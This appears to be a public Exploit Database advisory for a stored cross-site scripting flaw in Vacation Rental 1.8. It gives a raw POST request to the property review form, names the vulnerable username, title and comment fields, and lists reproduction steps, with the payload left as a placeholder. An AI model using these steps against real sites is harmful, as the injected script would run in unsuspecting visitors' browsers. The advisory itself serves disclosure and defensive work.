Vacation Rental 1.8 – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 48 阅读

• 作者： CraCkEr
  日期： 2023-07-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51562/

• # Exploit Title: Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)
  # Date: 30/06/2023
  # Exploit Author: CraCkEr
  # Vendor: GZ Scripts
  # Vendor Homepage: https://gzscripts.com/
  # Software Link: https://gzscripts.com/vacation-rental-website.html
  # Version: 1.8
  # Tested on: Windows 10 Pro
  # Impact: Manipulate the content of the site
  
  ## Stored XSS
  
  ------------------------------------------------------------
  POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1
  
  property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj
  ------------------------------------------------------------
  
  POST parameter 'username' is vulnerable to XSS
  POST parameter 'title' is vulnerable to XSS
  POST parameter 'comment' is vulnerable to XSS
  
  ## Steps to Reproduce:
  
  1. Surf (as Guest) - Go to any Listed Property
  2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)
  3. Inject your [XSS Payload] in "Username"
  4. Inject your [XSS Payload] in "Title"
  5. Inject your [XSS Payload] in "Comment"
  6. Submit
  7. XSS Fired on Local Browser
  8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]
  Note: I think Administration Panel missing a section to Manage [Reviews] on the website
  this feature must be added in next Updates [View/Edit/Delete]